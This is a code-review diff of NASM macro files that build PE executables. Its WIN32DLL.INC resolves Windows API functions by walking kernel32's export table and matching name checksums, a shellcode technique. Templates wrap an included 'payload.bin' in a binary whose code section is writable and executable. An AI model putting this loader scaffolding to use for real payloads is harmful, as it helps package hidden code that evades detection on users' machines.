%assign PEOptionalHeader_InitializedDataFSa_Assign PEOptionalHeader_InitializedDataFSa_Assign+PESection.data_FSa
%if PEOptionalHeader_DataRVAa_Assign == 0
%assign PEOptionalHeader_DataRVAa_Assign PESection.data_RVAa
%endif
%pop
%else
%error PE.INC error: PESection.data_End => PESection.data_Begin
%endif
%endmacro
%macro PESection.bss_Begin 0
%ifctx PESections_Begin
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
SECTION .bss
PESection.bss_Begin_FAa:
%define PESectionCur_FAa_Define PESection.bss_Begin_FAa
%push PESection.bss_Begin
%else
%error PE.INC error: PESection.bss_Begin => PESections_Begin
%endif
%endmacro
%macro PESection.bss_End 0
%ifctx PESection.bss_Begin
PESection.bss_End_FA:
ResbAlign PESection.bss_Begin_FAa,PEOptionalHeader_Va
PESection.bss_End_FAa:
%assign PEHeader_SectionsNumber_Assign PEHeader_SectionsNumber_Assign+1
PESection.bss_VS equ PESection.bss_End_FA-PESection.bss_Begin_FAa
PESection.bss_VSa equ PESection.bss_End_FAa-PESection.bss_Begin_FAa
SECTION .text
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
PESection.bss_RVAa equ PESectionPrec_RVAa_Assign
PESection.bss_FSa equ 0
%assign PESectionPrec_FSa_Assign PESection.bss_VSa
PESectionHeader.bss_FAa equ 0
%pop
%else
%error PE.INC error: PESection.bss_End => PESection.bss_Begin
%endif
%endmacro
%macro PESection.idata_Begin 0
%ifctx PESections_Begin
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
PESection.idata_Begin_FAa:
%define PESectionCur_FAa_Define PESection.idata_Begin_FAa
%push PESection.idata_Begin
%else
%error PE.INC error: PESection.idata_Begin => PESections_Begin
%endif
%endmacro
%macro PESection.idata_End 0
%ifctx PESection.idata_Begin
MacroPESection_End .idata
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
PESection.idata_RVAa equ PESectionPrec_RVAa_Assign
PESection.idata_FSa equ PESection.idata_End_FAa-PESection.idata_Begin_FAa
PESectionHeader.idata_FAa equ PESection.idata_Begin_FAa
%assign PESectionPrec_FSa_Assign PESection.idata_FSa
%pop
%else
%error PE.INC error: PESection.idata_End => PESection.idata_Begin
%endif
%endmacro
%macro PESection.rsrc_Begin 0
%ifctx PESections_Begin
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
PESection.rsrc_Begin_FAa:
%define PESectionCur_FAa_Define PESection.rsrc_Begin_FAa
%push PESection.rsrc_Begin
%else
%error PE.INC error: PESection.rsrc_Begin => PESections_Begin
%endif
%endmacro
%macro PESection.rsrc_End 0
%ifctx PESection.rsrc_Begin
MacroPESection_End .rsrc
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
PESection.rsrc_RVAa equ PESectionPrec_RVAa_Assign
PESection.rsrc_FSa equ PESection.rsrc_End_FAa-PESection.rsrc_Begin_FAa
PESectionHeader.rsrc_FAa equ PESection.rsrc_Begin_FAa
%assign PESectionPrec_FSa_Assign PESection.rsrc_FSa
%pop
%else
%error PE.INC error: PESection.rsrc_End => PESection.rsrc_Begin
%endif
%endmacro
%macro PESections_End 0
%ifctx PESections_Begin
PESections_End_FAa:
PEHeader_SectionsNumber equ PEHeader_SectionsNumber_Assign
PEOptionalHeader_InitializedDataFSa equ PEOptionalHeader_InitializedDataFSa_Assign
PEOptionalHeader_DataRVAa equ PEOptionalHeader_DataRVAa_Assign
%assign PESectionPrec_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign) / PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
PEOptionalHeader_ImageVSa equ PESectionPrec_RVAa_Assign
Import_Directorys_RVA equ Import_Directorys_Assign
%repl PESections_End
%else
%error PE.INC error: PESections_End => PESections_Begin
%endif
%endmacro
;============================= Import Directorys =============================
;Import_Directorys_Begin sectionname
%macro Import_Directorys_Begin 1
Import_Directorys_Begin_FA:
%assign Import_Directorys_Assign PESectionCur_RVAa_Assign+Import_Directorys_Begin_FA-PESectionCur_FAa_Define
%push Import_Directorys_Begin
%endmacro
;Import_Directory dlllogicalname
%macro Import_Directory 1
%ifctx Import_Directorys_Begin
dd PESection_RVA(Import.%1_RVAs)
dd 0 ;??? (date 0)
dd 0FFFFFFFFh
dd PESection_RVA(Import.%1_String_Dll)
dd PESection_RVA(Import.%1_VAs)
%else
%error PE.INC error: Import_Directory => Import_Directorys_Begin
%endif
%endmacro
%macro Import_Directorys_End 0
%ifctx Import_Directorys_Begin
times 5 dd 0
Import_Directorys_End_FA:
Import_Directorys_VS equ Import_Directorys_End_FA-Import_Directorys_Begin_FA
%pop
%else
%error PE.INC error: Import_Directorys_End => Import_Directorys_Begin
%endif
%endmacro
;Import_RVAs_Begin dlllogicalname
%macro Import_RVAs_Begin 1
Import.%1_RVAs:
%push Import_RVAs_Begin
%endmacro
;Import_RVA dlllogicalname,functionlogicalname
%macro Import_RVA 2
%ifctx Import_RVAs_Begin
dd PESection_RVA(Import.%1.%2_String_Function)
%else
%error PE.INC error: Import_RVA => Import_RVAs_Begin
%endif
%endmacro
%macro Import_RVAs_End 0
%ifctx Import_RVAs_Begin
dd 0
%pop
%else
%error PE.INC error: Import_RVAs_End => Import_RVAs_Begin
%endif
%endmacro
;Import_VAs_Begin dlllogicalname
%macro Import_VAs_Begin 1
Import.%1_VAs:
%push Import_VAs_Begin
%endmacro
;Import_VA dlllogicalname,functionlogicalname,[va]
%macro Import_VA 2-3 0FFFFFFFFh
%ifctx Import_VAs_Begin
Import.%1.%2: dd %3
%2 equ PEOptionalHeader_ImageVAa+PESectionCur_RVAa_Assign+Import.%1.%2-PESectionCur_FAa_Define
%else
%error PE.INC error: Import_VA => Import_VAs_Begin
%endif
%endmacro
%macro Import_VAs_End 0
%ifctx Import_VAs_Begin
dd 0
%pop
%else
%error PE.INC error: Import_VAs_End => Import_VAs_Begin
%endif
%endmacro
;Import_Strings_Begin dlllogicalname
%macro Import_Strings_Begin 1
Import.%1_Strings:
%push Import_Strings_Begin
%endmacro
;Import_String_Function dlllogicalname,functionlogicalname,"name",[ordinal]
%macro Import_String_Function 3-4 0h
%ifctx Import_Strings_Begin
Import.%1.%2_String_Function:
dw %4
db %3,0
%else
%error PE.INC error: Import_String_Function => Import_Strings_Begin
%endif
%endmacro
;Import_String_Dll dlllogicalname,"dllname"
%macro Import_String_Dll 2
%ifctx Import_Strings_Begin
Import.%1_String_Dll:
db %2,0
%repl Import_String_Dll
%else
%error PE.INC error: Import_String_Dll => Import_Strings_Begin
%endif
%endmacro
%macro Import_Strings_End 0
%ifctx Import_String_Dll
%pop
%else
%error PE.INC error: Import_Strings_End => Import_String_Dll
%endif
%endmacro
;================================== BIN End ==================================
%macro BIN_End 0
%ifctx PESections_End
BIN_End_FA:
DbAlign BIN_Begin_FA,PEOptionalHeader_Fa
BIN_End_FAa:
%pop
%else
%error PE.INC error: BIN_End => PESections_End
%endif
%endmacro
%endif
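Review bot: The MZ page count at L1535 is one too many: `dw (BIN_End_FAa-BIN_Begin_FA)/512+1` adds a page unconditionally, yet BIN_End_FAa is aligned to PEOptionalHeader_Fa (200h) by the DbAlign at L2056, so the size is always an exact multiple of 512, e_cblp at L1534 is always 0 (last page full) and e_cp overstates the file by one page. The conventional `dw (BIN_End_FAa-BIN_Begin_FA+511)/512` is correct for any size and stays correct if the alignment ever changes; the Windows loader ignores both fields, so only the DOS stub sees this, which is presumably why it went unnoticed. The SizeOfImage rounding at L1940 likewise adds a full PEOptionalHeader_Va even when the sum is already aligned, unlike the `-1` form at L1783 — harmless over-reservation, but worth making consistent. Finally, the defaults at L1605 and L1653 (NORELOCATIONS set, DllFlags 0) yield a fixed-base image at 00400000h that opts into neither DEP nor ASLR; that is acceptable for a payload test harness, but a one-line comment saying these defaults can be overridden by a `%define` after the include (as L1392 does for the entry RVA) would help anyone building something more than a test binary.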


@ -0,0 +1,55 @@
; MACROS FOR WIN32 PROGRAMMING v1.0a
; ==================================
;WIN32.INC_NO_EXTERN_IMPORT => pas d'Import
;ExternImport function,dll [,d|[*]]
; <- FUNCTION.INC_CONVENTION
;================================= General ===================================
%ifndef _WIN32.INC
%define _WIN32.INC
%include "function.inc"
%include "language.inc"
%include "win32n.inc"
%include "win32dll.inc"
%macro WIN32.INC 0
FUNCTION.INC
%undef WIN32.INC_NO_EXTERN_IMPORT
%endmacro
%macro WIN32.INC~ 0
FUNCTION.INC~
%undef WIN32.INC_NO_EXTERN_IMPORT
%endmacro
WIN32.INC
%macro ExternImport 2-3
%ifndef ExternImport_%1
%ifndef WIN32.INC_NO_EXTERN_IMPORT
extern %1
import %1 %2
Alias @%1,[%1]
FunctionDefine %1,FUNCTION.INC_CONVENTION
%else
%if %0==3
%ifnum %3
FunctionDefine %1,FUNCTION.INC_CONVENTION,%3
%else
Alias @%1,%3
FunctionDefine %1,FUNCTION.INC_CONVENTION
%endif
%else
Error WIN32,NO_EXTERN_IMPORT => ExternImport %1,%2,d|[*]
%endif
%endif
%define ExternImport_%1
%endif
%endmacro
%endif
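Review bot: The header comment at L2071 documents `ExternImport function,dll [,d|[*]]` but not what the optional third argument does; from the body, a numeric %3 is forwarded to `FunctionDefine` (L2099) while any other form becomes the `Alias @%1,%3` indirection target (L2101), and it is only honoured when WIN32.INC_NO_EXTERN_IMPORT is defined. Suggest extending L2071 with `; d = value passed to FunctionDefine, [*] = memory operand aliased to @function (NO_EXTERN_IMPORT mode only)`. Separately, L2108 marks `ExternImport_%1` as defined even when the L2105 error path was taken, so a later, corrected ExternImport of the same name is silently skipped; moving the `%define` into the successful branches avoids masking the second attempt.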


@ -0,0 +1,390 @@
; MACROS POUR L'IMPORTATION DE FONCTIONS DE DLLS WIN32 v0.9a
; ==========================================================
;WIN32DLL.INC_TABLE_REGISTER = edi = registre qui pointera la table
;WIN32DLL.INC_PUSH => sauvegarde des registres sur la pile
;WIN32DLL.INC_KERNEL32.DLL = WIN32DLL.INC_9X | WIN32DLL.INC_NT
; |WIN32DLL.INC_2000|r contenant l'adresse de base de KERNEL32.DLL
;WIN32DLL.INC_BYTE_BEGIN = 252 = 1er byte du codage dans la table
;GetBase r
; r -> adresse de base à partir de l'adresse originale contenue dans r
;GetChecksum(chaine)
; EAX -> checksum de chaine
;GetVAExportChecksum(base,checksum)
; EAX -> VA de la fonction de checksum à partir de l'Export Table de
; l'adresse de base de la DLL parcourue | 0
;DllBegin
; Dll kernel32.dll,"kernel32.dll"
; [DllFunction LoadLibraryA,...]
; [DllFunction GetProcAddress,...]
; ...
; Dll dll [,"dll"]
; DllFunction function [,"function"|d [,d]]
; ...
; ...
;DllEnd
;<- WIN32.INC_NO_EXTERN_IMPORT,BYTE.INC_NO_00,FUNCTION.INC_CONVENTION
;================================= General ===================================
%ifndef _WIN32DLL.INC
%define _WIN32DLL.INC
%include "win32.inc"
%macro WIN32DLL.INC 0
%define WIN32DLL.INC_TABLE_REGISTER edi
%define WIN32DLL.INC_PUSH
%define WIN32DLL.INC_9X 0BFF70000h
%define WIN32DLL.INC_NT 077F00000h
%define WIN32DLL.INC_2000 077E00000h
%define WIN32DLL.INC_KERNEL32.DLL WIN32DLL.INC_9X
%define WIN32DLL.INC_BYTE_BEGIN 252
%define DllChecksum_Define WIN32DLL.INC_BYTE_BEGIN
%define DllFunction_Define WIN32DLL.INC_BYTE_BEGIN+1
%define DllDll_Define WIN32DLL.INC_BYTE_BEGIN+2
%define DllEnd_Define WIN32DLL.INC_BYTE_BEGIN+3
%endmacro
WIN32DLL.INC
;=================================== DLLs ====================================
%macro GetBase 1
And %1,0FFFF0000h
GetBase_Boucle:
cmp word[%1],'MZ'
JX e,GetBase_Fin,+1
Sub eax,10000h
Jmp GetBase_Boucle,-1
GetBase_Fin:
%endmacro
%macro Function_GetChecksum 0
Function GetChecksum,GetChecksum_Chaine
FunctionBegin
pushf
push esi
push edx
cld
mov esi,[GetChecksum_Chaine]
Mov edx,0
GetChecksum_BoucleChar:
Mov eax,0
lodsb
shl ax,8 ;AX=cc00
add edx,eax ;ajoute le caractère au checksum
Cmp eax,0
JX z,GetChecksum_Fin,+1 ;si fin de chaîne
Mov eax,0
lodsb ;AX=cc
add edx,eax ;ajoute le caractère au checksum
Cmp al,0
JX nz,GetChecksum_BoucleChar,-1 ;si pas fin de chaîne
GetChecksum_Fin:
mov eax,edx
pop edx
pop esi
popf
FunctionEnd
%endmacro
%macro Function_GetVAExportChecksum 0
Function GetVAExportChecksum,GetVAExportChecksum_VA,GetVAExportChecksum_Checksum
FunctionBegin
pushf
push edi
push esi
push edx
push ecx
push ebx
cld
mov esi,[GetVAExportChecksum_VA]
mov ebx,esi
mov ebx,[byte ebx+03Ch]
add ebx,esi ;EBX=adresse header PE
mov ebx,[byte ebx+078h]
add ebx,esi ;EBX=adresse Export Table
mov edx,[byte ebx+018h] ;EDX=nombre noms
Mov ecx,0 ;ECX=indice courant liste adresses noms
GetVAExportChecksum_BoucleNom:
mov edi,[byte ebx+020h]
add edi,esi ;EDI=adresse liste adresses noms
mov edi,[edi+4*ecx]
add edi,esi ;EDI=adresse chaîne
push edx
mov edx,[GetVAExportChecksum_Checksum] ;EDX=checksum recherché
xchg esi,edi ;ESI=adresse chaîne
GetVAExportChecksum_BoucleChar:
Mov eax,0
lodsb
shl ax,8 ;AX=cc00
sub edx,eax ;soustrait le caractère du checksum
Cmp eax,0
JX z,GetVAExportChecksum_FinNom,+1 ;si fin de chaîne
Mov eax,0
lodsb ;AX=cc
sub edx,eax ;soustrait le caractère du checksum
Cmp al,0
JX nz,GetVAExportChecksum_BoucleChar,-1 ;si pas fin de chaîne
GetVAExportChecksum_FinNom:
xchg esi,edi ;EDI=adresse chaîne
test edx,edx
pop edx
JX z,GetVAExportChecksum_NomTrouve,+1 ;si checksum recherchée
inc ecx
cmp ecx,edx
JX nae,GetVAExportChecksum_BoucleNom,-1 ;si pas fin => boucle suivant
Mov eax,0
Jmp GetVAExportChecksum_Fin,+1 ;sinon fin
GetVAExportChecksum_NomTrouve:
Mov eax,0
mov edi,[byte ebx+024h]
add edi,esi ;EDI=adresse liste ordinaux
mov ax,[edi+2*ecx] ;AX=ordinal
mov edi,[byte ebx+01Ch]
add edi,esi ;EDI=adresse liste adresses
mov eax,[edi+4*eax]
add eax,esi ;EAX=adresse fonction
GetVAExportChecksum_Fin:
pop ebx
pop ecx
pop edx
pop esi
pop edi
popf
FunctionEnd
%endmacro
%macro DllBegin 0
%ifctx Dll
Error WIN32DLL,DllBegin =X=> DllBegin
%else
%push Dll
%undef Dll_LoadLibraryA_Define
%undef Dll_GetProcAddress_Define
%undef Dll_kernel32.dll_Define
%assign Dll_Function_Assign 1
%define FUNCTION.INC_CONVENTION Std
%ifdef WIN32.INC_NO_EXTERN_IMPORT
%ifdef WIN32DLL.INC_PUSH
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ebp
push ebp
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,edi
push edi
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,esi
push esi
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,edx
push edx
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ecx
push ecx
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ebx
push ebx
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,eax
push eax
%endif
%endif
Call %$End,+1
%endif
%endif
%endmacro
%macro Dll 1-2
%ifctx Dll
%define Dll_Dll_Define %1
%ifdef WIN32.INC_NO_EXTERN_IMPORT
%if %0==2
%ifnidn %1,kernel32.dll
%define Dll_kernel32.dll
db %2,DllDll_Define
%endif
%else
Error WIN32DLL,NO_EXTERN_IMPORT => Dll dll,"dll"
%endif
%endif
%else
Error WIN32DLL,Dll => DllBegin
%endif
%endmacro
%macro DllFunctionExternImport 2-3
%if %0==2
%ifstr %2
db %2,DllFunction_Define
%else
db DllChecksum_Define
dd ~(%2)
%endif
%1_Equ equ Dll_Function_Assign
ExternImport %1,Dll_Dll_Define,[byte WIN32DLL.INC_TABLE_REGISTER+%1_Equ]
%assign Dll_Function_Assign Dll_Function_Assign+4
%else
ExternImport %1,Dll_Dll_Define,%3
%endif
%endmacro
%macro DllFunction 1-3
%ifctx Dll
%ifdef WIN32.INC_NO_EXTERN_IMPORT
%if %0>1
%ifidn %1,LoadLibraryA
%if %0==3
DllFunctionExternImport %1,%2,%3
%define Dll_LoadLibraryA_Define
%endif
%elifidn %1,GetProcAddress
%if %0==3
DllFunctionExternImport %1,%2,%3
%define Dll_GetProcAddress_Define
%endif
%else
%ifndef Dll_LoadLibraryA_Define
DllFunctionExternImport LoadLibraryA,000023761h ;'oL'+'da'+'iL'+'rb'+'ra'+'Ay'
%define Dll_LoadLibraryA_Define
%endif
%ifndef Dll_GetProcAddress_Define
DllFunctionExternImport GetProcAddress,00002DBA1h ;'eG'+'Pt'+'or'+'Ac'+'dd'+'er'+'ss'
%define Dll_GetProcAddress_Define
%endif
%if %0==2
%ifstr %2
%ifndef Dll_kernel32.dll
db "kernel32.dll",DllDll_Define
%define Dll_kernel32.dll
%endif
%endif
DllFunctionExternImport %1,%2
%else
DllFunctionExternImport %1,%2,%3
%endif
%endif
%else
Error WIN32DLL,NO_EXTERN_IMPORT => DllFunction function,"function"|d [,d]
%endif
%else
ExternImport %1,Dll_Dll_Define
%endif
%else
Error WIN32DLL,DllFunction => DllBegin
%endif
%endmacro
%macro DllEnd 0
%ifctx Dll
%ifdef WIN32.INC_NO_EXTERN_IMPORT
db DllEnd_Define
Function_GetVAExportChecksum
%$End:
%ifnidn WIN32DLL.INC_KERNEL32.DLL,edx
Mov edx,WIN32DLL.INC_KERNEL32.DLL
%endif
pop esi ;ESI=offset jump table
push esi
mov edi,esi ;EDI=offset jump table
mov ebp,esi
dec ebp ;EBP=offset jump table-1
DllEnd_BoucleNom:
mov ebx,esi ;EBX=dÚbut chaîne courante
DllEnd_BoucleChar:
lodsb
cmp al,WIN32DLL.INC_BYTE_BEGIN
JX b,DllEnd_BoucleChar,-1 ;si <252
dec esi ;sinon >=252 =>chaine ou fin
Mov ah,0
mov [esi],ah ;00 de fin de chaîne
inc esi
cmp al,WIN32DLL.INC_BYTE_BEGIN
JX e,DllEnd_252,+1 ;si =252
cmp al,WIN32DLL.INC_BYTE_BEGIN+2
JX a,DllEnd_End,+1 ;si =255
push edi ;sauve EDI
push esi ;sauve ESI
JX e,DllEnd_254,+1 ;si =254
DllEnd_253: ;sinon =253 => fonction
push edx ;sauve EDX
xchg WIN32DLL.INC_TABLE_REGISTER,ebp
GetProcAddress(edx,ebx)
xchg WIN32DLL.INC_TABLE_REGISTER,ebp
pop edx
pop esi
pop edi
stosd ;ajoute à la jump table
Jmp DllEnd_BoucleNom,-1
DllEnd_252: ;=252 => checksum
lodsd
not eax
TemporaryBegin dword,-,eax
%define BYTE.INC_TEMPORARY_REGISTER Temporary_Ret
GetVAExportChecksum(edx,eax)
%undef BYTE.INC_TEMPORARY_REGISTER
TemporaryEnd
stosd ;ajoute à la jump table
Jmp DllEnd_BoucleNom,-1
DllEnd_254: ;=254 => dll
xchg WIN32DLL.INC_TABLE_REGISTER,ebp
LoadLibraryA(ebx)
xchg WIN32DLL.INC_TABLE_REGISTER,ebp
mov edx,eax ;EDX=handle de la DLL
pop esi
pop edi
Jmp DllEnd_BoucleNom,-1
DllEnd_End: ;=255
pop WIN32DLL.INC_TABLE_REGISTER
dec WIN32DLL.INC_TABLE_REGISTER
%ifdef WIN32DLL.INC_PUSH
%ifnidni WIN32DLL.INC_TABLE_REGISTER,eax
pop eax
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ebx
pop ebx
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ecx
pop ecx
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,edx
pop edx
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,esi
pop esi
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,edi
pop edi
%endif
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ebp
pop ebp
%endif
%endif
%endif
%pop
%else
Error WIN32DLL,DllEnd => DllBegin
%endif
%endmacro
%endif
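Review bot: `GetBase` at L2160–L2168 takes the register as %1, but the step at L2165 is `Sub eax,10000h`, so with any register other than eax the value compared at L2163 never changes and the loop cannot terminate; it should read `Sub %1,10000h`. Its labels `GetBase_Boucle`/`GetBase_Fin` are plain symbols rather than macro-local `%%Boucle`/`%%Fin`, so a second expansion in one file is a symbol-redefinition error; `Function_GetChecksum` and `Function_GetVAExportChecksum` have the same shape but are presumably meant to be expanded exactly once each, which a comment on each `%macro` line could state. The hard-coded module bases at L2148–L2151 with WIN32DLL.INC_KERNEL32.DLL defaulting to the 9X value are version-specific constants; the header comment at L2120–L2121 lists the choices but not that the default is 9X, so `; default: WIN32DLL.INC_9X` next to L2151 would spare readers a search.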



@ -0,0 +1,3 @@
global _start
_start:
incbin "payload.bin"


@ -0,0 +1,71 @@
%include "pe.inc"
BIN_Begin
MZHeader
MZExtendedHeader
MZSection.text_Begin
push cs
pop ds
mov dx,MZSection.text_VA(text_string)
mov ah,09
int 21h
mov ax,4C01h
int 21h
text_string: db 'This program cannot be run in DOS mode.',0Dh,0Ah,'$'
MZSection.text_End
PEHeader
%define PEOptionalheader_EipRVA PESection.text_RVA(PayloadEntry)
PEOptionalHeader_Begin
PEOptionalHeader_Directory Export,0,0
PEOptionalHeader_Directory Import,Import_Directorys_RVA,Import_Directorys_VS
PEOptionalHeader_End
PESectionHeader .text,'.text',PESectionHeader_Flags_EXECUTABLECODE | PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_EXECUTEACCESS | PESectionHeader_Flags_READACCESS| PESectionHeader_Flags_WRITEACCESS
PESectionHeader .rdata,'.rdata',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS
PESectionHeader .data,'.data',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS | PESectionHeader_Flags_WRITEACCESS
PESectionHeader .bss,'.bss', PESectionHeader_Flags_DATA0 | PESectionHeader_Flags_READACCESS | PESectionHeader_Flags_WRITEACCESS
PESectionHeader .idata,'.idata',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS
PESections_Begin
PESection.text_Begin
PayloadEntry:
incbin "payload.bin"
call [PESection.idata_VA(Import.KERNEL32.ExitProcess)]
PESection.text_End
PESection.rdata_Begin
db 0x90
PESection.rdata_End
PESection.data_Begin
db 0x90
PESection.data_End
PESection.bss_Begin
resb 0x100
PESection.bss_End
PESection.idata_Begin
Import_Directorys_Begin .idata
Import_Directory KERNEL32
Import_Directorys_End
Import_RVAs_Begin KERNEL32
Import_RVA KERNEL32,ExitProcess
Import_RVAs_End
Import_VAs_Begin KERNEL32
Import_VA KERNEL32,ExitProcess,0BFF8D4CAh
Import_VAs_End
Import_Strings_Begin KERNEL32
Import_String_Function KERNEL32,ExitProcess,"ExitProcess",07Fh
Import_String_Dll KERNEL32,"KERNEL32.DLL"
Import_Strings_End
PESection.idata_End
PESections_End
BIN_End
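Review bot: The fall-through exit after the incbin'd payload calls ExitProcess through the IAT with no argument pushed; ExitProcess is stdcall with one UINT parameter, so the process exit status becomes whatever dword happens to sit at [esp] if the payload ever returns. Push an explicit status first: `push 0` followed by `call [PESection.idata_VA(Import.KERNEL32.ExitProcess)]` — ExitProcess never returns, so the stack imbalance itself is harmless, only the status is garbage. The .text section header grants READ|WRITE|EXECUTE, which is presumably deliberate so in-place decoder stubs can patch the embedded payload, but an RWX code section is a common AV/heuristic trigger and deserves a comment such as `; .text is RWX on purpose: encoded payloads decode themselves in place`. The 0BFF8D4CAh written into the ExitProcess IAT slot looks like a stale Win9x kernel32 address; for an unbound import the loader rewrites that slot at load time, so a short `; placeholder, overwritten by the loader` note would stop readers from treating it as a live dependency.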
